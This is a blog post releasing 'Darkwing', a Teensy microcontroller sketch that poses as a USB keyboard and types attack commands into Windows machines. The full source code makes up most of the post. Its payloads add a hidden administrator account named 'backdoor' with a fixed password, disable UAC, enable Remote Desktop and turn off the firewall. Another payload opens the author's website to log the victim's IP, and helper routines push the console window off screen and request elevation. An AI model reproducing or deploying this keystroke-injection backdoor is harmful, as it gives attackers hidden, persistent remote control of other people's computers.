The Unstoppable Windows Hacking Device

Next in a long run of Windows hacks, we have a device that cannot be blocked easily via software, and is fully customizable.  The Teensy 2.0 (purchased for $18 at www.pjrc.com) is an Arduino-like microcontroller that can be programmed to act as a keyboard once plugged in.  The device and vendor IDs can be changed at will, making it extremely difficult to block it as a single device.  (I, myself, have mine identifying as an Apple Pro Keyboard - as it requires no drivers in Linux, Mac OS X, or Windows - and doesn't cue OS X to identify an unknown keyboard.)  There is an application out there that takes inventory of your USB devices and monitors for, and blocks, new devices - but unless you have this highly obscure program running, you are likely to fall victim to this device.

Once properly programmed (using either C++, or the Arduino IDE), the Teensy can spew text as a normal keyboard would - but it can do it at rates much higher than anyone can accurately type.  Entire batch scripts, full sets of commands, and anything else you can think of (including mouse movements) can be programmed in.  Using this method, you can open a back door right into any Windows machine (or Mac or Linux box - although they are somewhat more difficult, due to the inherent security mechanisms built in... we'll take a look at those at a later date.  They require a bit of social engineering.)

The following is a script I've put together called Darkwing.  (Named after the duck, of course, and because, until recently, my Teensy has been housed inside of a rubber duck squeaky toy as first designed by Hak5's Darren Kitchen.)

  // Darkwing v0.1
  // USB Ducky Framework for the Teensy 2.0
  // by HaDAk
  // for the Hak.5 Community -- please contribute, distribute, and credit!

  // Variables
  // Counts the power-on LED blinks in setup(); it is never reset afterwards.
  int blinkcount = 0;

  // OS X payloads
  // Declared but not referenced anywhere in this sketch.
  char* osx_ips = "ifconfig";

  // *nix payloads
  // Declared but not referenced anywhere in this sketch.
  char* nix_ips = "ifconfig";

  // Windows Payloads
  // NOTE(review): every payload is a plain string typed verbatim through the
  // emulated keyboard, so all of it is visible to host-side controls:
  // process/command-line logging of net.exe, reg.exe and netsh.exe, auditing
  // of the registry keys named in these strings, and any policy that blocks
  // newly attached HID devices all see this activity.
  // NOTE(review): initialising a non-const char* from a string literal is
  // ill-formed in standard C++ (the conversion was deprecated in C++03 and
  // removed in C++11); it typically builds only with a toolchain warning.
  // Add user "backdoor" with password "p@$$w0rd",
  // add to the local admin group, and hide from the login screen
  char* win_adduser = "net user backdoor p@$$w0rd /add && REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /V backdoor /T REG_DWORD /F /D \"0\" && net localgroup \"Administrators\" backdoor /ADD";
  // Disable UAC
  char* win_disableuac = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v EnableLUA /t REG_DWORD /d 0 /f";
  // Enable Remote Desktop
  char* win_enablerdp = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f";
  // Disable Windows Firewall
  char* win_disablefirewall = "netsh firewall set opmode disable";
  // Launch their browser to your favorite website -- I use this to collect their IP and other system metrics
  char* win_launchwebsite = "start /min www.hadak.org/pwnd-by-a-ducky";

  // Runs once at power-on: signal power via the LED, wait for the host to
  // enumerate the keyboard, open a console, push it off screen, and type each
  // Windows payload followed by Enter.  Only the Windows path is live; the
  // Linux and OS X launchers are left commented out, and nothing here checks
  // which host OS is actually attached.
  void setup() {
    // Blink when the ducky is first plugged in, to verify power to it.
    while(blinkcount < 2){
      blink(50);
      blinkcount++;
    }
    // Windows generally needs a longer delay to enumerate the device.  3000ms is
    // typically sufficient, depending on the speed of the machine. Additionally,
    // the first time the device is plugged in, Windows will need a while to
    // install drivers.  To avoid a really high delay, I recommend unplugging the
    // Ducky, letting Windows install the drivers, then replugging it.
    // The value will probably vary by machine, so experiment to find what works.
    delay(3000);
    blink(50);
    // Open a console via the Run dialog; the long argument string configures the
    // console window (small size, no title) before the payloads are typed.
    RunWinUACCommand("cmd /Q /D /T:7F /F:OFF /V:OFF /K \"@echo off && mode con:RATE=31 DELAY=0 && mode con:COLS=15 LINES=1 && title . && cls\""); // Vile's better command line: http://www.hak5.org/forums/index.php?showtopic=16505
    //RunGnomeKDECommand("xterm");     // Linux (Gnome/KDE) command line example
    //RunOSXCommand("Terminal.app");   // OS X Command line example
    delay(500);

    // Move window off screen
    win_MoveWindow();

    // Administer payload(s)
    // Each string is typed as-is and submitted with enter().  The device has no
    // feedback channel: it cannot tell whether the console opened or whether any
    // previous command succeeded, so the order below is fixed and unconditional.
    Keyboard.print(win_disableuac);
    enter();
    Keyboard.print(win_adduser);
    enter();
    Keyboard.print(win_enablerdp);
    enter();
    Keyboard.print(win_disablefirewall);
    enter();
    Keyboard.print(win_launchwebsite);
    enter();
    // Close the console once the payloads have been typed.
    Keyboard.print("exit");
    enter();

  }

  // Runs forever after setup(): a slow LED blink as a "still alive" heartbeat.
  // No further keystrokes are sent from here.
  void loop() {
    blink(400);
  }

  // Pulse the LED on PIN_D6 once: on for `time` ms, then off for `time` ms.
  // pinMode() is (re)applied on every call, as in the original sketch.
  void blink(int time){
    pinMode( PIN_D6, OUTPUT );    // set LED to super bright
    // Two halves of one blink: first HIGH (LED on), then LOW (LED off),
    // each held for the same duration.
    for (int half = 0; half < 2; ++half) {
      digitalWrite(PIN_D6, half == 0 ? HIGH : LOW);
      delay(time);
    }
  }

  // Press the Enter key and release it.  Two HID reports are sent: one with
  // KEY_ENTER in key slot 1, then one with the slot cleared.
  void enter(){
    Keyboard.set_key1(KEY_ENTER);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
  }

  // Type `cmd` into a desktop run dialog opened with Alt+F2 (the launcher
  // shortcut the post attributes to Gnome/KDE), then press Enter.
  // The 500 ms pause is the only allowance for the dialog to appear; the
  // device cannot observe whether it did.
  // Not called by setup() in this revision (only referenced in a comment).
  void RunGnomeKDECommand(char *cmd){
    Keyboard.set_modifier(MODIFIERKEY_ALT);   // hold Alt ...
    Keyboard.set_key1(KEY_F2);                // ... and press F2
    Keyboard.send_now();
    Keyboard.set_modifier(0);                 // release both
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(500);
    Keyboard.print(cmd);
    enter();
  }

  // Type `cmd` into whatever Cmd+Space opens on the host (presumably the
  // Spotlight search field -- TODO confirm), wait, then press Enter.
  // Unlike the other launchers this one also pauses 500 ms after typing,
  // before Enter is sent.
  // Not called by setup() in this revision (only referenced in a comment).
  void RunOSXCommand(char *cmd){
    Keyboard.set_modifier(MODIFIERKEY_GUI);   // hold Cmd ...
    Keyboard.set_key1(KEY_SPACE);             // ... and press Space
    Keyboard.send_now();
    Keyboard.set_modifier(0);                 // release both
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(500);
    Keyboard.print(cmd);
    delay(500);
    enter();
  }

  // Open the Windows Run dialog with Win+R, wait 500 ms, type `cmd`, and
  // press Enter.  Whatever is typed runs with the interactive user's normal
  // token; see RunWinUACCommand() for the variant that asks for elevation.
  // Not called by setup() in this revision.
  void RunWindowsCommand(char *cmd){
    Keyboard.set_modifier(MODIFIERKEY_GUI);   // hold the Windows key ...
    Keyboard.set_key1(KEY_R);                 // ... and press R
    Keyboard.send_now();
    Keyboard.set_modifier(0);                 // release both
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(500);
    Keyboard.print(cmd);
    enter();
  }

  // Open the Windows Run dialog (Win+R), type `cmd`, and submit it with
  // Ctrl+Shift+Enter rather than a plain Enter; the post describes this as
  // opening an elevated (UAC) command line on Vista/7.  After a 500 ms wait a
  // further key report and another Enter are sent, presumably aimed at the
  // UAC prompt -- TODO confirm on a real host.
  // NOTE(review): KEY_RIGHT is passed to set_modifier() in the second
  // sequence; what the host makes of that report is not determinable from
  // this sketch.
  // Defender's view: the device has no feedback channel, so every step here
  // assumes the previous one succeeded; whatever UAC prompt policy the host
  // enforces still stands between the typed command and an elevated console.
  void RunWinUACCommand(char *cmd){
    Keyboard.set_modifier(MODIFIERKEY_GUI);   // hold the Windows key ...
    Keyboard.set_key1(KEY_R);                 // ... and press R
    Keyboard.send_now();
    Keyboard.set_modifier(0);                 // release both
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(50);                                // only 50 ms here, vs 500 ms in RunWindowsCommand()
    Keyboard.print(cmd);
    Keyboard.set_modifier(MODIFIERKEY_CTRL|MODIFIERKEY_SHIFT);  // hold Ctrl+Shift ...
    Keyboard.send_now();
    enter();                                                    // ... while Enter is pressed and released
    Keyboard.set_modifier(0);                                   // release Ctrl+Shift
    Keyboard.send_now();
    delay(500);
    Keyboard.set_modifier(KEY_RIGHT);
    Keyboard.send_now();
    Keyboard.set_modifier(0);
    Keyboard.send_now();
    enter();
  }

  // Push the foreground window downwards so the console is out of sight:
  // Alt+Space (presumably the window's system menu -- TODO confirm), "m"
  // (move), 250 Down presses, then Enter to commit the new position.
  // Each Down press is a press report followed by a release report, with no
  // delay between iterations.
  // The window is moved, not hidden: it is presumably still listed in the
  // taskbar and the process list, which is where a user or an endpoint agent
  // would still see it.
  void win_MoveWindow(){
    int move = 0;                             // Down presses sent so far
    Keyboard.set_modifier(MODIFIERKEY_ALT);   // hold Alt ...
    Keyboard.set_key1(KEY_SPACE);             // ... and press Space
    Keyboard.send_now();
    Keyboard.set_modifier(0);                 // release both
    Keyboard.set_key1(0);
    Keyboard.send_now();
    Keyboard.print("m");
    while(move < 250){
      Keyboard.set_key1(KEY_DOWN);
      Keyboard.send_now();
      Keyboard.set_key1(0);
      Keyboard.send_now();
      move++;
    }
    enter();
  }


Darkwing contains several functions to make your life much easier when writing scripts.  There are included functions for things such as opening a UAC command line in Windows Vista and 7, moving a window to the bottom of the screen, so it's out of sight, and running applications in Windows, Mac OS X, and Linux (Gnome and KDE - or whatever else uses the Alt+F2 launcher).

The payloads included with Darkwing will add an administrative user to Windows, hide it from the login screen, disable the firewall, disable UAC, and enable remote desktop.  A future revision of this script will reside in a Windows script with several executables, but that's a post for another day.

For now, I am releasing the current incarnation of my script into the wild with the same disclaimer as always: this hack is meant to raise awareness of the inherent insecurities of computer systems, particularly Windows, and ideally to nudge Microsoft into creating a more secure computing environment.  Please do NOT use this script or any information here for illegal purposes, as I am NOT responsible for your actions.

